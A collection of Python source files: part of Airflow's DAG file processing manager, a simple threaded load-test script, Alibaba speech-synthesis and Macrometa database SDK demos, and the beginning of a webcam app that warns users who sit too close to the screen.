self._direct_scheduler_conn: self._direct_scheduler_conn,
}
if self._direct_scheduler_conn is not None
else {}
)
def register_exit_signals(self):
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
# So that we ignore the debug dump signal, making it easier to send
signal.signal(signal.SIGUSR2, signal.SIG_IGN)
def _exit_gracefully(self, signum, frame):
"""Helper method to clean up DAG file processors to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
self.log.debug("Current Stacktrace is: %s", '\n'.join(map(str, inspect.stack())))
self.terminate()
self.end()
self.log.debug("Finished terminating DAG processors.")
sys.exit(os.EX_OK)
def start(self):
"""
Use multiple processes to parse and generate tasks for the
DAGs in parallel. By processing them in separate processes,
we can get parallelism and isolation from potentially harmful
user code.
"""
self.register_exit_signals()
# Start a new process group
os.setpgid(0, 0)
self.log.info("Processing files using up to %s processes at a time ", self._parallelism)
self.log.info("Process each file at most once every %s seconds", self._file_process_interval)
self.log.info(
"Checking for new files in %s every %s seconds", self._dag_directory, self.dag_dir_list_interval
)
return self._run_parsing_loop()
@provide_session
def _deactivate_stale_dags(self, session=None):
"""
Detects DAGs which are no longer present in files
Deactivate them and remove them in the serialized_dag table
"""
now = timezone.utcnow()
elapsed_time_since_refresh = (now - self.last_deactivate_stale_dags_time).total_seconds()
if elapsed_time_since_refresh > self.deactivate_stale_dags_interval:
last_parsed = {
fp: self.get_last_finish_time(fp) for fp in self.file_paths if self.get_last_finish_time(fp)
}
to_deactivate = set()
dags_parsed = (
session.query(DagModel.dag_id, DagModel.fileloc, DagModel.last_parsed_time)
.filter(DagModel.is_active)
.all()
)
for dag in dags_parsed:
# The largest valid difference between a DagFileStat's last_finished_time and a DAG's
# last_parsed_time is _processor_timeout. Longer than that indicates that the DAG is
# no longer present in the file.
if (
dag.fileloc in last_parsed
and (dag.last_parsed_time + self._processor_timeout) < last_parsed[dag.fileloc]
):
self.log.info(f"DAG {dag.dag_id} is missing and will be deactivated.")
to_deactivate.add(dag.dag_id)
if to_deactivate:
deactivated = (
session.query(DagModel)
.filter(DagModel.dag_id.in_(to_deactivate))
.update({DagModel.is_active: False}, synchronize_session="fetch")
)
if deactivated:
self.log.info("Deactivated %i DAGs which are no longer present in file.", deactivated)
for dag_id in to_deactivate:
SerializedDagModel.remove_dag(dag_id)
self.log.info("Deleted DAG %s in serialized_dag table", dag_id)
self.last_deactivate_stale_dags_time = timezone.utcnow()
def _run_parsing_loop(self):
# In sync mode we want timeout=None -- wait forever until a message is received
if self._async_mode:
poll_time = 0.0
else:
poll_time = None
self._refresh_dag_dir()
self.prepare_file_path_queue()
max_callbacks_per_loop = conf.getint("scheduler", "max_callbacks_per_loop")
standalone_dag_processor = conf.getboolean("scheduler", "standalone_dag_processor")
if self._async_mode:
# If we're in async mode, we can start up straight away. If we're
# in sync mode we need to be told to start a "loop"
self.start_new_processes()
while True:
loop_start_time = time.monotonic()
ready = multiprocessing.connection.wait(self.waitables.keys(), timeout=poll_time)
if self._direct_scheduler_conn is not None and self._direct_scheduler_conn in ready:
agent_signal = self._direct_scheduler_conn.recv()
self.log.debug("Received %s signal from DagFileProcessorAgent", agent_signal)
if agent_signal == DagParsingSignal.TERMINATE_MANAGER:
self.terminate()
break
elif agent_signal == DagParsingSignal.END_MANAGER:
self.end()
sys.exit(os.EX_OK)
elif agent_signal == DagParsingSignal.AGENT_RUN_ONCE:
# continue the loop to parse dags
pass
elif isinstance(agent_signal, CallbackRequest):
self._add_callback_to_queue(agent_signal)
else:
raise ValueError(f"Invalid message {type(agent_signal)}")
if not ready and not self._async_mode:
# In "sync" mode we don't want to parse the DAGs until we
# are told to (as that would open another connection to the
# SQLite DB which isn't a good practice
# This shouldn't happen, as in sync mode poll should block for
# ever. Lets be defensive about that.
self.log.warning(
"wait() unexpectedly returned nothing ready after infinite timeout (%r)!", poll_time
)
continue
for sentinel in ready:
if sentinel is self._direct_scheduler_conn:
continue
processor = self.waitables.get(sentinel)
if not processor:
continue
self._collect_results_from_processor(processor)
self.waitables.pop(sentinel)
self._processors.pop(processor.file_path)
if standalone_dag_processor:
self._fetch_callbacks(max_callbacks_per_loop)
self._deactivate_stale_dags()
self._refresh_dag_dir()
self._kill_timed_out_processors()
# Generate more file paths to process if we processed all the files
# already.
if not self._file_path_queue:
self.emit_metrics()
self.prepare_file_path_queue()
self.start_new_processes()
# Update number of loop iteration.
self._num_run += 1
if not self._async_mode:
self.log.debug("Waiting for processors to finish since we're using sqlite")
# Wait until the running DAG processors are finished before
# sending a DagParsingStat message back. This means the Agent
# can tell we've got to the end of this iteration when it sees
# this type of message
self.wait_until_finished()
# Collect anything else that has finished, but don't kick off any more processors
self.collect_results()
self._print_stat()
all_files_processed = all(self.get_last_finish_time(x) is not None for x in self.file_paths)
max_runs_reached = self.max_runs_reached()
try:
if self._direct_scheduler_conn:
self._direct_scheduler_conn.send(
DagParsingStat(
max_runs_reached,
all_files_processed,
)
)
except BlockingIOError:
# Try again next time around the loop!
# It is better to fail, than it is deadlock. This should
# "almost never happen" since the DagParsingStat object is
# small, and in async mode this stat is not actually _required_
# for normal operation (It only drives "max runs")
self.log.debug("BlockingIOError received trying to send DagParsingStat, ignoring")
if max_runs_reached:
self.log.info(
"Exiting dag parsing loop as all files have been processed %s times", self._max_runs
)
break
if self._async_mode:
loop_duration = time.monotonic() - loop_start_time
if loop_duration < 1:
poll_time = 1 - loop_duration
else:
poll_time = 0.0
@provide_session
def _fetch_callbacks(self, max_callbacks: int, session: Session = NEW_SESSION):
"""Fetches callbacks from database and add them to the internal queue for execution."""
self.log.debug("Fetching callbacks from the database.")
with prohibit_commit(session) as guard:
query = (
session.query(DbCallbackRequest)
.order_by(DbCallbackRequest.priority_weight.asc())
.limit(max_callbacks)
)
callbacks = with_row_locks(
query, of=DbCallbackRequest, session=session, **skip_locked(session=session)
).all()
for callback in callbacks:
try:
self._add_callback_to_queue(callback.get_callback_request())
session.delete(callback)
except Exception as e:
self.log.warning("Error adding callback for execution: %s, %s", callback, e)
guard.commit()
def _add_callback_to_queue(self, request: CallbackRequest):
self._callback_to_execute[request.full_filepath].append(request)
# Callback has a higher priority over DAG Run scheduling
if request.full_filepath in self._file_path_queue:
# Remove file paths matching request.full_filepath from self._file_path_queue
# Since we are already going to use that filepath to run callback,
# there is no need to have same file path again in the queue
self._file_path_queue = [
file_path for file_path in self._file_path_queue if file_path != request.full_filepath
]
self._file_path_queue.insert(0, request.full_filepath)
def _refresh_dag_dir(self):
"""Refresh file paths from dag dir if we haven't done it for too long."""
now = timezone.utcnow()
elapsed_time_since_refresh = (now - self.last_dag_dir_refresh_time).total_seconds()
if elapsed_time_since_refresh > self.dag_dir_list_interval:
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self._dag_directory)
self._file_paths = list_py_file_paths(self._dag_directory)
self.last_dag_dir_refresh_time = now
self.log.info("There are %s files in %s", len(self._file_paths), self._dag_directory)
self.set_file_paths(self._file_paths)
try:
self.log.debug("Removing old import errors")
self.clear_nonexistent_import_errors()
except Exception:
self.log.exception("Error removing old import errors")
# Check if file path is a zipfile and get the full path of the python file.
# Without this, SerializedDagModel.remove_deleted_files would delete zipped dags.
# Likewise DagCode.remove_deleted_code
dag_filelocs = []
for fileloc in self._file_paths:
if not fileloc.endswith(".py") and zipfile.is_zipfile(fileloc):
with zipfile.ZipFile(fileloc) as z:
dag_filelocs.extend(
[
os.path.join(fileloc, info.filename)
for info in z.infolist()
if might_contain_dag(info.filename, True, z)
]
)
else:
dag_filelocs.append(fileloc)
SerializedDagModel.remove_deleted_dags(dag_filelocs)
DagModel.deactivate_deleted_dags(self._file_paths)
from airflow.models.dagcode import DagCode
DagCode.remove_deleted_code(dag_filelocs)
def _print_stat(self):
"""Occasionally print out stats about how fast the files are getting processed"""
if 0 < self.print_stats_interval < time.monotonic() - self.last_stat_print_time:
if self._file_paths:
self._log_file_processing_stats(self._file_paths)
self.last_stat_print_time = time.monotonic()
@provide_session
def clear_nonexistent_import_errors(self, session):
"""
Clears import errors for files that no longer exist.
:param session: session for ORM operations
"""
query = session.query(errors.ImportError)
if self._file_paths:
query = query.filter(~errors.ImportError.filename.in_(self._file_paths))
query.delete(synchronize_session='fetch')
session.commit()
def _log_file_processing_stats(self, known_file_paths):
"""
Print out stats about how files are getting processed.
:param known_file_paths: a list of file paths that may contain Airflow
DAG definitions
:return: None
"""
# File Path: Path to the file containing the DAG definition
# PID: PID associated with the process that's processing the file. May
# be empty.
# Runtime: If the process is currently running, how long it's been
# running for in seconds.
# Last Runtime: If the process ran before, how long did it take to
# finish in seconds
# Last Run: When the file finished processing in the previous run.
headers = ["File Path", "PID", "Runtime", "# DAGs", "# Errors", "Last Runtime", "Last Run"]
rows = []
now = timezone.utcnow()
for file_path in known_file_paths:
last_runtime = self.get_last_runtime(file_path)
num_dags = self.get_last_dag_count(file_path)
num_errors = self.get_last_error_count(file_path)
file_name = os.path.basename(file_path)
file_name = os.path.splitext(file_name)[0].replace(os.sep, '.')
processor_pid = self.get_pid(file_path)
processor_start_time = self.get_start_time(file_path)
runtime = (now - processor_start_time) if processor_start_time else None
last_run = self.get_last_finish_time(file_path)
if last_run:
seconds_ago = (now - last_run).total_seconds()
Stats.gauge(f'dag_processing.last_run.seconds_ago.{file_name}', seconds_ago)
rows.append((file_path, processor_pid, runtime, num_dags, num_errors, last_runtime, last_run))
# Sort by longest last runtime. (Can't sort None values in python3)
rows = sorted(rows, key=lambda x: x[3] or 0.0)
formatted_rows = []
for file_path, pid, runtime, num_dags, num_errors, last_runtime, last_run in rows:
formatted_rows.append(
(
file_path,
pid,
f"{runtime.total_seconds():.2f}s" if runtime else None,
num_dags,
num_errors,
f"{last_runtime:.2f}s" if last_runtime else None,
last_run.strftime("%Y-%m-%dT%H:%M:%S") if last_run else None,
)
)
log_str = (
"\n"
+ "=" * 80
+ "\n"
+ "DAG File Processing Stats\n\n"
+ tabulate(formatted_rows, headers=headers)
+ "\n"
+ "=" * 80
)
self.log.info(log_str)
def get_pid(self, file_path):
"""
:param file_path: the path to the file that's being processed
:return: the PID of the process processing the given file or None if
the specified file is not being processed
:rtype: int
"""
if file_path in self._processors:
return self._processors[file_path].pid
return None
def get_all_pids(self):
"""
:return: a list of the PIDs for the processors that are running
:rtype: List[int]
"""
return [x.pid for x in self._processors.values()]
def get_last_runtime(self, file_path):
"""
:param file_path: the path to the file that was processed
:return: the runtime (in seconds) of the process of the last run, or
None if the file was never processed.
:rtype: float
"""
stat = self._file_stats.get(file_path)
return stat.last_duration if stat else None
def get_last_dag_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:return: the number of dags loaded from that file, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.num_dags if stat else None
def get_last_error_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:return: the number of import errors from processing, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.import_errors if stat else None
def get_last_finish_time(self, file_path):
"""
:param file_path: the path to the file that was processed
:return: the finish time of the process of the last run, or None if the
file was never processed.
:rtype: datetime
"""
stat = self._file_stats.get(file_path)
return stat.last_finish_time if stat else None
def get_start_time(self, file_path):
"""
:param file_path: the path to the file that's being processed
:return: the start time of the process that's processing the
specified file or None if the file is not currently being processed
:rtype: datetime
"""
if file_path in self._processors:
return self._processors[file_path].start_time
return None
def get_run_count(self, file_path):
"""
:param file_path: the path to the file that's being processed
:return: the number of times the given file has been parsed
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.run_count if stat else 0
def set_file_paths(self, new_file_paths):
"""
Update this with a new set of paths to DAG definition files.
:param new_file_paths: list of paths to DAG definition files
:return: None
"""
self._file_paths = new_file_paths
self._file_path_queue = [x for x in self._file_path_queue if x in new_file_paths]
# Stop processors that are working on deleted files
filtered_processors = {}
for file_path, processor in self._processors.items():
if file_path in new_file_paths:
filtered_processors[file_path] = processor
else:
self.log.warning("Stopping processor for %s", file_path)
Stats.decr('dag_processing.processes')
processor.terminate()
self._file_stats.pop(file_path)
self._processors = filtered_processors
def wait_until_finished(self):
"""Sleeps until all the processors are done."""
for processor in self._processors.values():
while not processor.done:
time.sleep(0.1)
def _collect_results_from_processor(self, processor) -> None:
self.log.debug("Processor for %s finished", processor.file_path)
Stats.decr('dag_processing.processes')
last_finish_time = timezone.utcnow()
if processor.result is not None:
num_dags, count_import_errors = processor.result
else:
self.log.error(
"Processor for %s exited with return code %s.", processor.file_path, processor.exit_code
)
count_import_errors = -1
num_dags = 0
last_duration = (last_finish_time - processor.start_time).total_seconds()
stat = DagFileStat(
num_dags=num_dags,
import_errors=count_import_errors,
last_finish_time=last_finish_time,
last_duration=last_duration,
run_count=self.get_run_count(processor.file_path) + 1,
)
self._file_stats[processor.file_path] = stat
file_name = os.path.splitext(os.path.basename(processor.file_path))[0].replace(os.sep, '.')
Stats.timing(f'dag_processing.last_duration.{file_name}', last_duration)
def collect_results(self) -> None:
"""Collect the result from any finished DAG processors"""
ready = multiprocessing.connection.wait(
self.waitables.keys() - [self._direct_scheduler_conn], timeout=0
)
for sentinel in ready:
if sentinel is self._direct_scheduler_conn:
continue
processor = cast(DagFileProcessorProcess, self.waitables[sentinel])
self.waitables.pop(processor.waitable_handle)
self._processors.pop(processor.file_path)
self._collect_results_from_processor(processor)
self.log.debug("%s/%s DAG parsing processes running", len(self._processors), self._parallelism)
self.log.debug("%s file paths queued for processing", len(self._file_path_queue))
@staticmethod
def _create_process(file_path, pickle_dags, dag_ids, callback_requests):
"""Creates DagFileProcessorProcess instance."""
return DagFileProcessorProcess(
file_path=file_path, pickle_dags=pickle_dags, dag_ids=dag_ids, callback_requests=callback_requests
)
def start_new_processes(self):
"""Start more processors if we have enough slots and files to process"""
while self._parallelism - len(self._processors) > 0 and self._file_path_queue:
file_path = self._file_path_queue.pop(0)
# Stop creating duplicate processor i.e. processor with the same filepath
if file_path in self._processors.keys():
continue
callback_to_execute_for_file = self._callback_to_execute[file_path]
processor = self._create_process(
file_path, self._pickle_dags, self._dag_ids, callback_to_execute_for_file
)
del self._callback_to_execute[file_path]
Stats.incr('dag_processing.processes')
processor.start()
self.log.debug("Started a process (PID: %s) to generate tasks for %s", processor.pid, file_path)
self._processors[file_path] = processor
self.waitables[processor.waitable_handle] = processor
def prepare_file_path_queue(self):
"""Generate more file paths to process. Result are saved in _file_path_queue."""
self._parsing_start_time = time.perf_counter()
# If the file path is already being processed, or if a file was
# processed recently, wait until the next batch
file_paths_in_progress = self._processors.keys()
now = timezone.utcnow()
# Sort the file paths by the parsing order mode
list_mode = conf.get("scheduler", "file_parsing_sort_mode")
files_with_mtime = {}
file_paths = []
is_mtime_mode = list_mode == "modified_time"
file_paths_recently_processed = []
for file_path in self._file_paths:
if is_mtime_mode:
try:
files_with_mtime[file_path] = os.path.getmtime(file_path)
except FileNotFoundError:
self.log.warning("Skipping processing of missing file: %s", file_path)
continue
file_modified_time = timezone.make_aware(datetime.fromtimestamp(files_with_mtime[file_path]))
else:
file_paths.append(file_path)
file_modified_time = None
# Find file paths that were recently processed to exclude them
# from being added to file_path_queue
# unless they were modified recently and parsing mode is "modified_time"
# in which case we don't honor "self._file_process_interval" (min_file_process_interval)
last_finish_time = self.get_last_finish_time(file_path)
if (
last_finish_time is not None
and (now - last_finish_time).total_seconds() < self._file_process_interval
and not (is_mtime_mode and file_modified_time and (file_modified_time > last_finish_time))
):
file_paths_recently_processed.append(file_path)
# Sort file paths via last modified time
if is_mtime_mode:
file_paths = sorted(files_with_mtime, key=files_with_mtime.get, reverse=True)
elif list_mode == "alphabetical":
file_paths = sorted(file_paths)
elif list_mode == "random_seeded_by_host":
# Shuffle the list seeded by hostname so multiple schedulers can work on different
# set of files. Since we set the seed, the sort order will remain same per host
random.Random(get_hostname()).shuffle(file_paths)
files_paths_at_run_limit = [
file_path for file_path, stat in self._file_stats.items() if stat.run_count == self._max_runs
]
file_paths_to_exclude = set(file_paths_in_progress).union(
file_paths_recently_processed, files_paths_at_run_limit
)
# Do not convert the following list to set as set does not preserve the order
# and we need to maintain the order of file_paths for `[scheduler] file_parsing_sort_mode`
files_paths_to_queue = [
file_path for file_path in file_paths if file_path not in file_paths_to_exclude
]
for file_path, processor in self._processors.items():
self.log.debug(
"File path %s is still being processed (started: %s)",
processor.file_path,
processor.start_time.isoformat(),
)
self.log.debug("Queuing the following files for processing:\n\t%s", "\n\t".join(files_paths_to_queue))
for file_path in files_paths_to_queue:
if file_path not in self._file_stats:
self._file_stats[file_path] = DagFileStat(
num_dags=0, import_errors=0, last_finish_time=None, last_duration=None, run_count=0
)
self._file_path_queue.extend(files_paths_to_queue)
def _kill_timed_out_processors(self):
"""Kill any file processors that timeout to defend against process hangs."""
now = timezone.utcnow()
processors_to_remove = []
for file_path, processor in self._processors.items():
duration = now - processor.start_time
if duration > self._processor_timeout:
self.log.error(
"Processor for %s with PID %s started at %s has timed out, killing it.",
file_path,
processor.pid,
processor.start_time.isoformat(),
)
Stats.decr('dag_processing.processes')
Stats.incr('dag_processing.processor_timeouts')
# TODO: Remove after Airflow 2.0
Stats.incr('dag_file_processor_timeouts')
processor.kill()
# Clean up processor references
self.waitables.pop(processor.waitable_handle)
processors_to_remove.append(file_path)
# Clean up `self._processors` after iterating over it
for proc in processors_to_remove:
self._processors.pop(proc)
def max_runs_reached(self):
""":return: whether all file paths have been processed max_runs times"""
if self._max_runs == -1: # Unlimited runs.
return False
for stat in self._file_stats.values():
if stat.run_count < self._max_runs:
return False
if self._num_run < self._max_runs:
return False
return True
def terminate(self):
"""
Stops all running processors
:return: None
"""
for processor in self._processors.values():
Stats.decr('dag_processing.processes')
processor.terminate()
def end(self):
"""
Kill all child processes on exit since we don't want to leave
them as orphaned.
"""
pids_to_kill = self.get_all_pids()
if pids_to_kill:
kill_child_processes_by_pids(pids_to_kill)
def emit_metrics(self):
"""
Emit metrics about dag parsing summary
This is called once every time around the parsing "loop" - i.e. after
all files have been parsed.
"""
parse_time = time.perf_counter() - self._parsing_start_time
Stats.gauge('dag_processing.total_parse_time', parse_time)
Stats.gauge('dagbag_size', sum(stat.num_dags for stat in self._file_stats.values()))
Stats.gauge(
'dag_processing.import_errors', sum(stat.import_errors for stat in self._file_stats.values())
)
@property
def file_paths(self):
return self._file_paths
|
simulate-alert.py
|
import sys
import requests
import threading
######################################################################################
# Run the load-tests on the endpoint #
######################################################################################
def load_test(port, test_hostname):
try:
endpoint='/api/users'
http_req = "http://" + test_hostname + ":" + str(port) + endpoint
print(http_req)
rsp = requests.get(http_req)
if rsp.status_code != 200:
print("No URL for /api/users ...." + str(e))
except Exception as e:
print ("Encountered exception while running load-test", e)
######################################################################################
# Create load-test #
######################################################################################
if __name__=="__main__":
try:
#Configure the number of requests you want to execute on your endpoint
no_of_requests = 1000
if (len (sys.argv) < 2):
print ("Please pass two arguments - IP followed by the NodePort where the application is running..")
exit(1)
#test_hostname would your application hosted
hostIP = sys.argv[1]
#Node Port where the application is reachable
port = sys.argv[2]
#Schedule the threads
for i in range(no_of_requests):
request = threading.Thread(target=load_test, args=(port, hostIP))
request.start()
except Exception as e:
print ("Encountered exceptoin while running load-test", e)
finally:
print ("Load test executed succesfully..")
|
speech_synthesizer_demo.py
|
# -*- coding: utf-8 -*-
"""
* Copyright 2015 Alibaba Group Holding Limited
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
"""
import threading
import ali_speech
from ali_speech.callbacks import SpeechSynthesizerCallback
from ali_speech.constant import TTSFormat
from ali_speech.constant import TTSSampleRate
class MyCallback(SpeechSynthesizerCallback):
# 参数name用于指定保存音频的文件
def __init__(self, name):
self._name = name
self._fout = open(name, 'wb')
def on_meta_info(self, message):
print(message)
def on_binary_data_received(self, raw):
print('MyCallback.on_binary_data_received: %s' % len(raw))
self._fout.write(raw)
def on_completed(self, message):
print('MyCallback.OnRecognitionCompleted: %s' % message)
self._fout.close()
def on_task_failed(self, message):
print('MyCallback.OnRecognitionTaskFailed-task_id:%s, status_text:%s' % (
message['header']['task_id'], message['header']['status_text']))
self._fout.close()
def on_channel_closed(self):
print('MyCallback.OnRecognitionChannelClosed')
def process(client, appkey, token, text, audio_name):
callback = MyCallback(audio_name)
synthesizer = client.create_synthesizer(callback)
synthesizer.set_appkey(appkey)
synthesizer.set_token(token)
synthesizer.set_voice('xiaoyun')
synthesizer.set_text(text)
synthesizer.set_format(TTSFormat.WAV)
synthesizer.set_sample_rate(TTSSampleRate.SAMPLE_RATE_16K)
synthesizer.set_volume(50)
synthesizer.set_speech_rate(0)
synthesizer.set_pitch_rate(0)
try:
ret = synthesizer.start()
if ret < 0:
return ret
synthesizer.wait_completed()
except Exception as e:
print(e)
finally:
synthesizer.close()
def process_multithread(client, appkey, token, number):
thread_list = []
for i in range(0, number):
text = "这是线程" + str(i) + "的合成。"
audio_name = "sy_audio_" + str(i) + ".wav"
thread = threading.Thread(target=process, args=(client, appkey, token, text, audio_name))
thread_list.append(thread)
thread.start()
for thread in thread_list:
thread.join()
if __name__ == "__main__":
client = ali_speech.NlsClient()
# 设置输出日志信息的级别:DEBUG、INFO、WARNING、ERROR
client.set_log_level('INFO')
appkey = '您的appkey'
token = '您的token'
text = "今天是周一,天气挺好的。"
audio_name = 'sy_audio.wav'
process(client, appkey, token, text, audio_name)
# 多线程示例
# process_multithread(client, appkey, token, 10)
|
HowTo-UsingRealTimeGeoDistributedDatabase.py
|
from c8 import C8Client
import random
import threading
import time
# Variables
service_url = "gdn1.macrometa.io" # The request will be automatically routed to closest location.
user_mail = "user@example.com"
user_password = "hidden"
geo_fabric = "testfabric"
collection_name = "employees" + str(random.randint(1, 10000))
def create_callback():
def callback_fn(event):
print("received... document:{}".format(event))
return
fabric.on_change(collection_name, callback=callback_fn)
if __name__ == '__main__':
print("\n ------- CONNECTION SETUP ------")
print("user: {}, geofabric:{}".format(user_mail, geo_fabric))
client = C8Client(protocol='https', host=service_url, port=443) # Automatically routed to nearest region.
tenant = client.tenant(user_mail, user_password)
fabric = tenant.useFabric(geo_fabric)
print("Availabile regions....")
dclist = fabric.dclist(detail=True)
for dc in dclist:
print(" region: {}".format(dc["name"]))
print("Connected to closest region...\tregion: {}".format(fabric.localdc(detail=False)))
print("\n ------- CREATE GEO-REPLICATED COLLECTION ------")
employees = fabric.create_collection(collection_name)
print("Created collection: {}".format(collection_name))
time.sleep(2) # to account for network latencies in replication
print("\n ------- SUBSCRIBE TO CHANGES ------")
# Receive documents from the collection in realtime... PUSH Model
rt_thread = threading.Thread(target=create_callback)
rt_thread.start()
time.sleep(2)
print("Callback registered for collection: {}".format(collection_name))
print("\n ------- INSERT DOCUMENTS ------")
print("Inserting 3 documents to the collection...")
employees.insert({'_key':'John', 'firstname': 'John', 'lastname':'Wayne', 'email':'john.wayne@macrometa.io'})
employees.insert({'_key':'Clark', 'firstname': 'Clark', 'lastname':'Kent', 'email':'clark.kent@macrometa.io'})
employees.insert({'_key': 'Bruce', 'firstname': 'Bruce', 'lastname':'Wayne', 'email':'bruce.wayne@macrometa.io'})
print("Wait to close the callback...")
rt_thread.join()
print("\n ------- DONE ------")
|
GoodEyes.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 26 12:14:08 2022
@author: nuria
#todo
- change so that it does not pop up two times if I am already away (maybe sleep for 1sec? lets try)
"""
from __future__ import print_function
from threading import Thread
import pygame
import datetime
import time
import os
import json
import cv2 as cv
import argparse
import ctypes # An included library with Python install.
pygame_title = "GoodEyes"
pygame_icon_png = "eye.png"
stream = cv.VideoCapture(0, cv.CAP_DSHOW)
pygame.init()
screen_width, screen_height = 500, 500
screen = pygame.display.set_mode((screen_width, screen_height))
clock = pygame.time.Clock()
font_title = pygame.font.SysFont("Segoe UI", 40, bold = True)
font_30 = pygame.font.SysFont("calibri", 30)
font_24 = pygame.font.SysFont("calibri", 24)
font_18 = pygame.font.SysFont("calibri", 18)
font_16 = pygame.font.SysFont("calibri", 16)
font_14 = pygame.font.SysFont("calibri", 16)
filepath = os.path.dirname(__file__)
pygame.display.set_caption(pygame_title)
programIcon = pygame.image.load(os.path.join(filepath,pygame_icon_png))
pygame.display.set_icon(programIcon)
class button():
def __init__(self, color, x,y,width,height, text='', font=font_30):
self.color = color
self.x = x
self.y = y
self.width = width
self.height = height
self.text = text
self.font = font
def draw(self,screen):
#Call this method to draw the button on the screen
pygame.draw.rect(screen, self.color, (self.x,self.y,self.width,self.height),0,5)
if self.text != '':
text = self.font.render(self.text, 1, (255,255,255))
screen.blit(text, (self.x + (self.width/2 - text.get_width()/2), self.y + (self.height/2 - text.get_height()/2)))
def isOver(self, pos):
#Pos is the mouse position or a tuple of (x,y) coordinates
if pos[0] > self.x and pos[0] < self.x + self.width:
if pos[1] > self.y and pos[1] < self.y + self.height:
return True
return False
def change_button_color(button_key, pos, default_color=(0,0,0), isOver_color=(0,0,255)):
if button_key.isOver(pos):
button_key.color = isOver_color
else:
button_key.color = default_color
button_key.draw(screen)
pygame.display.update()
def detectWidth(frame):
frame_gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)
frame_gray = cv.equalizeHist(frame_gray)
faces = face_cascade.detectMultiScale(frame_gray,1.3,5)
width = 0
for (x, y, w, h) in faces:
center = (x + w // 2, y + h // 2)
frame = cv.ellipse(frame, center, (w // 2, h // 2), 0, 0, 360, (255, 0, 255), 4)
faceROI = frame_gray[y:y + h, x:x + w]
# -- In each face, detect eyes
eyes = eyes_cascade.detectMultiScale(faceROI)
for (x2, y2, w2, h2) in eyes:
eye_center = (x + x2 + w2 // 2, y + y2 + h2 // 2)
radius = int(round((w2 + h2) * 0.25))
frame = cv.circle(frame, eye_center, radius, (255, 0, 0), 4)
width = w
cv.imshow('Capture - Face detection', frame)
return width
def Mbox(title, text, style):
return ctypes.windll.user32.MessageBoxW(0, text, title, style)
def write_json(totalAlertTime, totalTime, num_popups):
HOUR = datetime.datetime.now().hour
MINUTE = datetime.datetime.now().minute
with open(os.path.join(filepath,"dict.json"),"r") as json_file:
json_dictionary = json.load(json_file)
with open(os.path.join(filepath,"dict.json"),"w") as json_file:
json_dictionary["h_{}_m_{}".format(HOUR,MINUTE)] = {}
json_dictionary["h_{}_m_{}".format(HOUR,MINUTE)]["AlertTime"] = round(totalAlertTime/totalTime*100, 1)
json_dictionary["h_{}_m_{}".format(HOUR,MINUTE)]["num_popups"] = round(num_popups/totalTime*60, 1)
json.dump(json_dictionary, json_file)
def draw_graph (x,y,width,height,x_lst,y_lsts):
colors = ((0,0,150),(0,150,0),(150,0,0))
pygame.draw.line(screen, (0,0,0),(x,y+height),(x+width, y+height))
pygame.draw.line(screen, (0,0,0), (x,y),(x,y+height))
max_x = float(max(x_lst))
for index, y_lst in enumerate(y_lsts):
max_y = float(max(y_lst))
prev_y_pos = 0
prev_x_pos = 0
color = colors[index]
for index, val in enumerate(y_lst):
i=index
y_pos = int(y+height-val/max_y*height)
x_pos = int(x+i/max_x*width)
pygame.draw.circle(screen, color,(x_pos,y_pos), 1)
if index >0:
pygame.draw.line(screen, color, (prev_x_pos, prev_y_pos),(x_pos,y_pos), )
prev_y_pos = y_pos
prev_x_pos = x_pos
def give_averages():
with open(os.path.join(filepath,"dict.json"),"r") as json_file:
json_dictionary = json.load(json_file)
alerttime_list = []
num_popups_list = []
hours_list = []
previous_hour = None
for index, sth in enumerate(json_dictionary):
next_hour = sth.split("_")[1]
if next_hour != previous_hour:
alerttime_list.append([])
num_popups_list.append([])
hours_list.append(next_hour)
alerttime_list[-1].append(json_dictionary[sth]["AlertTime"])
num_popups_list[-1].append(json_dictionary[sth]["num_popups"])
previous_hour = next_hour
width = 20
height = 270
write_message("week", rectangle=(width, height), font=font_16)
write_message("% time being", rectangle=(width, height+25), font=font_16)
write_message("too close", rectangle=(width, height+40), font=font_16)
write_message("avg alerts/min", rectangle=(width, height+70), font=font_16)
width +=150
y_lst = [[],[]]
for index, hours in enumerate(hours_list):
alert = sum(alerttime_list[index])/len(alerttime_list[index])
popups = sum(num_popups_list[index])/len(num_popups_list[index])
y_lst[0].append(alert)
y_lst[1].append(popups)
write_message(str(hours), rectangle=(width, height), centered=True, font=font_16)
write_message("{:.0f}".format(alert), rectangle=(width, height+37), centered=True, font=font_14)
write_message("{:.1f}".format(popups), rectangle=(width, height+70), centered=True, font=font_14)
width += 40
write_message("alert time", rectangle=(55,430), font=font_16, color=(0,0,150))
write_message("popups", rectangle=(55,450), font=font_16, color=(0,150,0))
draw_graph(50,370,400,100,hours_list, y_lst)
def draw_Initial_Screen():
ini=170
sp=20
screen.fill((255,255,255))
write_message("G", rectangle=(ini, 20), font=font_title, color=(148,0,211))
write_message("o", rectangle=(ini+sp, 20), font=font_title, color=(75,0,130))
write_message("o", rectangle=(ini+sp*2, 20), font=font_title, color=(75, 0, 130))
write_message("d", rectangle=(ini+sp*3, 20), font=font_title, color=(0, 0, 255))
write_message("E", rectangle=(ini+sp*4, 20), font=font_title, color=(0, 255, 0))
write_message("y", rectangle=(ini+sp*5, 20), font=font_title, color=(220, 220, 0))
write_message("e", rectangle=(ini+sp*6, 20), font=font_title, color=(255, 127, 0))
write_message("s", rectangle=(ini+sp*7, 20), font=font_title, color=(255, 0 , 0))
#write_message("GoodEyes", rectangle=(screen_width/2, 20), centered=True, font=font_title)
